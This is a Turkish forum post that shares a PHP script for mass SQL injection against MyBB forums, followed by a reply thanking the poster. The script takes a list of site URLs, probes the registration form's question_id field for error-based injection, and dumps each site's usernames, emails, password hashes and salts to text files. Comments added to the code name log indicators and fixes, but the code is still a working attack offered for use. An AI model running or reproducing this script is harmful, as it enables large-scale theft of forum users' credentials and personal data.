MyBB 2015 SQL injection script


Yapmanız gereken bunu bir ftpye atıp çalıştırmak ve mybb siteyi yazmak
You have to upload this script in ftp and write the mybb site


PHP:
<form method="post" action="">
Siteleri kutuya yazın : <br><textarea name="siteler" cols="35" rows="7"></textarea><br>
<input type="submit" value="tara">
</form>
<?php
// Driver: reads a newline-separated list of site URLs from the POST field
// "siteler", probes each one with checkVulnerable() and, on a positive
// result, calls Inject() to pull rows from that site's user table.
//
// Forensic note: when this file is found on a web host, the "dumpsss"
// directory it creates beside itself holds one <host>.txt per affected site
// (written by Inject()); those files identify whose data was exposed.
ob_start();
// Removes PHP's execution time limit so a long target list can run to the end.
set_time_limit(0);
if(!file_exists("dumpsss")) mkdir("dumpsss");
// "!" binds tighter than "==", so this evaluates (!$_POST['siteler']) == "".
// The branch is taken when the field is non-empty.
if(! $_POST['siteler']==""){

$siteler = explode("\n",$_POST['siteler']);
foreach($siteler as $sites){
// Strips surrounding whitespace, including the "\r" left by CRLF line endings.
$sites=trim($sites);
        if(checkVulnerable($sites)) {
            echo "[+] $sites Is Vulnerable!\n";
            Inject($sites);
        } else {
            echo "[-] Target Is Not Vulnerable\n";
        }
    }
} else {
    // No input submitted: nothing is done.
}

/**
 * Sends MyBB registration requests whose "question_id" field carries SQL,
 * parses the database error text echoed in the response, and appends the
 * recovered username, email, password value and salt to dumpsss/<host>.txt.
 *
 * Defender notes:
 *  - Log indicator: POST bodies with action=do_register in which question_id
 *    contains a quote character, "polygon(" or a nested "select" referring to
 *    mybb_users. The fixed field values (username=makman, imagehash=1c1d...,
 *    regtime=1416039333) are constant across every request this script sends.
 *  - The data comes back only because the forum returns the raw SQL error to
 *    the client; the regex below looks for it. Suppressing database error
 *    output closes that channel but does not fix the injection itself.
 *  - Fix: run a MyBB release in which question_id is validated before it
 *    reaches the query (release number not stated on this page).
 *  - If such requests appear in logs, treat the stored password values and
 *    salts as exposed and force password resets.
 *
 * @param string $site Base URL of the forum as typed into the form.
 */
function Inject($site) {
   $get_website = parse_url($site);
   // Host part of the URL; used only to name the output file.
   $website = $get_website["host"];
    // First request: asks for the row count of mybb_users (table name is hard-coded).
    $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select count(*) from mybb_users LIMIT 0,1)f)x))-- -");
    // Captures the quoted value that appears in the error text between "select '" and "' AS".
    preg_match('!select \'(.*)\' AS!s', $html, $matches);
    $count = $matches[1];
    echo "[+] Count: $count\n";

    // One request per row offset, from 0 through $count inclusive.
    for($i = 0; $i <= $count; $i++) {
        if($count == 1) {
            $num = "0,1";
        } else {
            $num = "$i,1";
        }
        // Per-row request: username, email, password and salt joined with ":" (0x3a).
        $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select concat(username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num)f)x))-- -");
        preg_match('!select \'(.*)\' AS!s', $html, $matches);
        if(isset($matches[1])) {
            $split = explode(":", $matches[1]);
            $username = $split[0];
            $email = $split[1];
            $password = $split[2];
            $salt = $split[3];
            echo "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n";
            // Appended in plain text; these files are the evidence trail on the hosting side.
            file_put_contents("dumpsss/$website.txt", "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n", FILE_APPEND);
        }
    }
}

/**
 * Probe: submits the registration form with question_id set to a single quote
 * and reports whether the response contains the MySQL syntax-error message.
 *
 * Defender notes:
 *  - A registration POST whose question_id is a lone "'" is the precursor to
 *    the requests sent by Inject(); alerting on it catches the probe stage.
 *  - The check depends entirely on the forum showing SQL error text to
 *    visitors. A site that hides that text is reported as not vulnerable here,
 *    whether or not the underlying query is safe, so hiding errors is not a
 *    substitute for patching.
 *
 * @param string $site Base URL of the forum.
 * @return bool True when the error string is present in the response.
 */
function checkVulnerable($site) {
    // This handle is created but not used anywhere in this function.
    $ch = curl_init();
    $html = HTTPPost("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id='");
    if(strpos($html, "You have an error in your SQL syntax")!==false) {
        return true;
    } else {
        return false;
    }
}

/**
 * Sends $post as a POST body with cURL and returns the response body.
 *
 * Log indicator: every caller in this file already passes a URL ending in
 * "/member.php", and this function appends "/member.php" again, so the
 * requests as written arrive with a path ending in "/member.php/member.php".
 *
 * @param string $site URL prefix; "/member.php" is appended to it here.
 * @param string $post Request body, passed to cURL exactly as given.
 * @return string|bool Response body, or false when curl_exec() fails.
 */
function HTTPPost($site, $post) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$site/member.php");
    // Return the body from curl_exec() instead of printing it.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Supplying POST fields switches the request method to POST.
    curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
    $html = curl_exec($ch);
    curl_close($ch);
    return $html;
}
?>
 
teşekkürler hocam eline sağlık ftp erişimi hakkında bir makalede yazarsa birisi çok çok faydalı olacak bu paylaşım :)
 